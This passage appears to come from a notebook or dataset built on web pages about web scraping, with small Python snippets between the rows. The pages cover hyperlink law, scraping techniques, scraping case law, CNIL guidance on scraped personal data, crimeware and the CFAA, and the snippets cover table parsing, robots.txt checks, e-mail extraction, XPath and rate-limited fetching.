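def mine_report(path="monthly_report.html"):
    # read_html extracts every <table> element from the saved report file.
    tables = pd.read_html(path)
    # Assume the first table holds the figures of interest (an assumption for this sketch).
    return tables[0]

# report_df = mine_report()  # hypothetical spooled report file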
306 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID596 | Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: <a href="http://chillingeffects.org/linking/">link</a> Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function," even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites. Linking Patent Goes to Court, Reuters, February 7, 2002 Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002 Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 Links and Law, Tim Berners-Lee (personal view) Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case) The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) |
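The FAQ above describes the Robots Exclusion standard. The sketch below shows one way a well-behaved scraper could consult a site's robots.txt before fetching a page, using only Python's standard library; the URL and user-agent string are placeholders.
from urllib.parse import urlparse
from urllib.robotparser import RobotFileParser

def allowed_to_fetch(url, user_agent="ExampleScraperBot"):
    parts = urlparse(url)
    robots_url = f"{parts.scheme}://{parts.netloc}/robots.txt"
    parser = RobotFileParser()
    parser.set_url(robots_url)
    parser.read()  # download and parse robots.txt
    return parser.can_fetch(user_agent, url)

# allowed_to_fetch("https://example.com/private/page.html")  # placeholder URL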
307 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-27 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
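As a small illustration of the contact-scraping use case mentioned above (collecting e-mail addresses from already-fetched pages), here is a hedged regex sketch; the pattern is deliberately simple and will not match every valid address.
import re

# Simplified e-mail pattern for illustration; real address syntax is more permissive.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def extract_emails(html_text):
    return sorted(set(EMAIL_RE.findall(html_text)))

# extract_emails('<a href="mailto:sales@example.com">Contact us</a>')  # -> ['sales@example.com']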
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Query languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may include metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Another approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
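To make the DOM-tree and XPath approach above concrete, here is a brief sketch. It assumes the third-party lxml package (not installed in the setup cells at the top of this notebook), and the URL and XPath expression are purely illustrative.
import requests
from lxml import html  # assumed extra dependency: pip install lxml

def titles_via_xpath(url):
    page = requests.get(url, timeout=10)
    page.raise_for_status()
    tree = html.fromstring(page.content)               # parse the page into a DOM tree
    return tree.xpath("//h2[@class='title']/text()")   # illustrative XPath query

# titles_via_xpath("https://example.com/blog")  # placeholder URL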
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use should be brought to the users' attention in order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
308 | https://en.wikipedia.org/wiki/Web_scraping | https://www.cnil.fr/fr/la-reutilisation-des-donnees-publiquement-accessibles-en-ligne-des-fins-de-demarchage-commercial | In 2019, the CNIL carried out several inspections of companies that collect Internet users' publicly accessible data online, in order to verify that their practices comply with the French Data Protection Act (loi Informatique et Libertés) and the GDPR. The CNIL regularly receives complaints about the practices of companies that harvest personal data from websites in order to carry out commercial prospecting. They concern, for example, companies collecting the telephone numbers of people appearing in classified ads published on consumer-to-consumer websites, or in online directories. This information is then used for prospecting even though the people concerned have indicated that they object to commercial canvassing. These companies are, for example: These companies use tools such as extraction software (web scraping) to automatically collect Internet users' contact details from the public areas of the Internet. Although publicly accessible, these data are personal data. Consequently, they may not be freely reused by any data controller and may not be re-exploited without the knowledge of the person concerned. The inspections carried out in 2019 revealed several breaches of data protection legislation: In order to respect people's rights, the CNIL reminds data controllers and their service providers of the good practices to adopt. Where people who published their data with a first data controller cannot reasonably expect to be the subject of, for example, commercial prospecting by another company, the reuse of the data by that other company for commercial purposes is possible only with their consent. Example: an individual who posts an ad on a consumer-to-consumer sales site does not reasonably expect to be canvassed by a professional. Their data therefore cannot be processed without their consent. Likewise, when a company reuses data publicly accessible on the Internet in order to carry out direct marketing of its products and services by electronic message or automated calling system, it must obtain the consent of the people concerned before doing so. It is necessary to ensure that the consent is free, specific, informed and unambiguous. In this respect, a user's general and undifferentiated acceptance of a service's terms of use (CGU) cannot be treated as specific consent, even if those terms of use were to inform the user that they are agreeing to receive electronic commercial prospecting. When the company canvasses people by another means (for example, telephone canvassing without an automated calling system), the software must make it possible not to collect the data of people registered on anti-prospecting lists held by a telephone operator or by the BLOCTEL scheme. In any event, the company using this software must not canvass people who have already objected to receiving commercial solicitations from it. Companies using this software must verify the nature and origin of the data collected. 
Indeed, some software extracts this information from websites whose terms of use (CGU) prohibit the harvesting and reuse of data for commercial purposes. In that case, the practice is not permitted. As with any processing of personal data, the collection of data for telephone canvassing must be limited to what is strictly necessary. Companies using this software must in particular be vigilant to avoid collecting irrelevant or excessive information, especially if it is sensitive (for example, information on people's health, religion or sexual orientation). To respect the balance between the interests of the companies using this software and the interests of the people concerned, it is essential that the company using the data-extraction software provide, at the latest at the time of the first communication with the people whose data are processed, the information required by Article 14 of the GDPR, in particular the information about the source of the data. The information must be concise, comprehensible and easily accessible to the people concerned. When a company uses the services of a provider that operates the software on its behalf, the company must ensure that the measures indicated above are taken into account. In addition, where the provider acts as a processor within the meaning of the GDPR, the contracts between the parties must comply with Article 28 of the GDPR by defining, in particular: The processor guide published by the CNIL details the processor's obligations and includes, among other things, an example of contractual clauses. In certain situations, a data protection impact assessment (DPIA) is mandatory before the processing is implemented. Moreover, even if such an impact assessment is not mandatory, carrying one out is good practice to ensure that the envisaged data processing complies with the GDPR. The CNIL will remain vigilant about this everyday concern of the French public and about the respect of their rights. |
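One practical point in the CNIL guidance above is that scraped contact data must be screened against opt-out lists (such as BLOCTEL) before any canvassing. Below is a toy sketch of that screening step; the data structures and field names are entirely hypothetical.
def remove_opted_out(contacts, opt_out_numbers):
    # contacts: list of dicts like {"name": ..., "phone": ...}  (hypothetical schema)
    # opt_out_numbers: set of phone numbers registered on an anti-prospecting list
    return [c for c in contacts if c.get("phone") not in opt_out_numbers]

# remove_opted_out([{"name": "A", "phone": "+33100000000"}], {"+33100000000"})  # -> []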
310 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-7 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
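The article above notes that large sites limit how many requests an IP may send. A polite scraper can stay under such limits by pacing its requests; the sketch below is an assumption-laden illustration (the delay value, user agent, and URLs are placeholders) using the requests and time modules imported earlier in this notebook.
import time
import requests

def fetch_politely(urls, delay_seconds=2.0, user_agent="ExampleScraperBot"):
    headers = {"User-Agent": user_agent}
    pages = {}
    for url in urls:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            pages[url] = response.text
        time.sleep(delay_seconds)  # pause between requests to limit load on the server
    return pages

# fetch_politely(["https://example.com/a", "https://example.com/b"])  # placeholder URLs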
311 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Crimeware | Crimeware is a class of malware designed specifically to automate cybercrime. 1 Crimeware (as distinct from spyware and adware) is designed to perpetrate identity theft through social engineering or technical stealth in order to access a computer user's financial and retail accounts for the purpose of taking funds from those accounts or completing unauthorized transactions on behalf of the cyberthief. Alternatively, crimeware may steal confidential or sensitive corporate information. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer valuable, confidential information. The cybercrime landscape has shifted from individuals developing their own tools to a market where crimeware, tools and services for illegal online activities, can be easily acquired in online marketplaces. These crimeware markets are expected to expand, especially targeting mobile devices. 2 The term crimeware was coined by David Jevans in February 2005 in an Anti-Phishing Working Group response to the FDIC article "Putting an End to Account-Hijacking Identity Theft". 3 Criminals use a variety of techniques to steal confidential data through crimeware, including the following methods: Crimeware threats can be installed on victims' computers through multiple delivery vectors, including: Crimeware can have a significant economic impact due to loss of sensitive and proprietary information and associated financial losses. One survey estimates that in 2005 organizations lost in excess of $30 million due to the theft of proprietary information. 9 The theft of financial or confidential information from corporate networks often places the organizations in violation of government and industry-imposed regulatory requirements that attempt to ensure that financial, personal and confidential information is protected. US laws and regulations include: |
312 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act | The Computer Fraud and Abuse Act of 1986 (CFAA) is a United States cybersecurity bill that was enacted in 1986 as an amendment to existing computer fraud law (18 U.S.C. 1030), which had been included in the Comprehensive Crime Control Act of 1984. 1 Prior to computer-specific criminal laws, computer crimes were prosecuted as mail and wire fraud, but the applying law was often insufficient. 2 The original 1984 bill was enacted in response to concern that computer-related crimes might go unpunished. 3 The House Committee Report to the original computer crime bill characterized the 1983 techno-thriller film WarGames—in which a young teenager (played by Matthew Broderick) from Seattle breaks into a U.S. military supercomputer programmed to predict possible outcomes of nuclear war and unwittingly almost starts World War III—as "a realistic representation of the automatic dialing and access capabilities of the personal computer. 4 The CFAA was written to extend existing tort law to intangible property, while, in theory, limiting federal jurisdiction to cases "with a compelling federal interest—i.e., where computers of the federal government or certain financial institutions are involved or where the crime itself is interstate in nature", but its broad definitions have spilled over into contract law (see "Protected Computer", below). In addition to amending a number of the provisions in the original section 1030, the CFAA also criminalized additional computer-related acts. Provisions addressed the distribution of malicious code and denial-of-service attacks. Congress also included in the CFAA a provision criminalizing trafficking in passwords and similar items. 1 Since then, the Act has been amended a number of times—in 1989, 1994, 1996, in 2001 by the USA PATRIOT Act, 2002, and in 2008 by the Identity Theft Enforcement and Restitution Act. With each amendment of the law, the types of conduct that fell within its reach were extended. In January 2015, President Barack Obama proposed expanding the CFAA and the RICO Act in his Modernizing Law Enforcement Authorities to Combat Cyber Crime proposal. 5 DEF CON organizer and Cloudflare researcher Marc Rogers, Senator Ron Wyden, and Representative Zoe Lofgren stated opposition to this on the grounds it would make many regular Internet activities illegal, and moved further away from what they were trying to accomplish with Aaron's Law. 6 The only computers, in theory, covered by the CFAA are defined as "protected computers". They are defined under section 18 U.S.C. 1030(e)(2) to mean a computer: In practice, any ordinary computer has come under the jurisdiction of the law, including cellphones, due to the interstate nature of most Internet communication. 7 (a) Whoever— The Computer Fraud and Abuse Act is both a criminal law and a statute that creates a private right of action, allowing compensation and injunctive or other equitable relief to anyone harmed by a violation of this law. These provisions have allowed private companies to sue disloyal employees for damages for the misappropriation of confidential information (trade secrets). There have been criminal convictions for CFAA violations in the context of civil law, for breach of contract or terms of service violations. Many common and insignificant online acts, such as password-sharing and copyright infringement, can transform a CFAA misdemeanor into a felony. 
The punishments are severe, similar to sentences for selling or importing drugs, and may be disproportionate. Prosecutors have used the CFAA to protect private business interests and to intimidate free-culture activists, deterring undesirable, yet legal, conduct. 49 50 One such example regarding the harshness of the law was shown in United States v. Tyler King, 51 where King refused initial offers by the government for involvement in a conspiracy to "gain unauthorized access" to a computer system for a small company that an ex-girlfriend of King worked for. His role, even while not directly involved, resulted in 6.5 years of imprisonment. No financial motive was established. A non-profit was started to advocate against further harshness against others targeted under the broad law. 52 Tim Wu called the CFAA "the worst law in technology". 53 Professor of Law Ric Simmons notes that many provisions of the CFAA merely combine identical language to pre-existing federal laws with "the element of accessing a protected computer without authorization, or by exceeding authorized access", 54 meaning that "the CFAA merely provides an additional charge for prosecutors to bring if the defendant used a computer while committing the crime". 55 Professor Joseph Olivenbaum has similarly criticized the CFAA's "computer-specific approach", noting both the risk of redundancy and resultant definitional problems. 56 The CFAA increasingly presents real obstacles to journalists reporting stories important to the public’s interest. 57 As data journalism increasingly becomes “a good way of getting to the truth of things . . . in this post-truth era”, as one data journalist told Google, the need for further clarity around the CFAA increases. 57 As per Star Kashman, an expert in cybersecurity law, the CFAA presents some challenges in cases related to Search Engine Hacking (also known as Google Dorking). Although Kashman states that accessing publicly available information is legal under the CFAA, she also notes that in many cases Search Engine Hacking is ultimately prosecuted under the CFAA. Kashman believes prosecuting cases of Google Dorking under the CFAA could render the CFAA void for vagueness by making it illegal to access publicly available information. 58 The government was able to bring such disproportionate charges against Aaron because of the broad scope of the Computer Fraud and Abuse Act (CFAA) and the wire fraud statute. It looks like the government used the vague wording of those laws to claim that violating an online service's user agreement or terms of service is a violation of the CFAA and the wire fraud statute. Using the law in this way could criminalize many everyday activities and allow for outlandishly severe 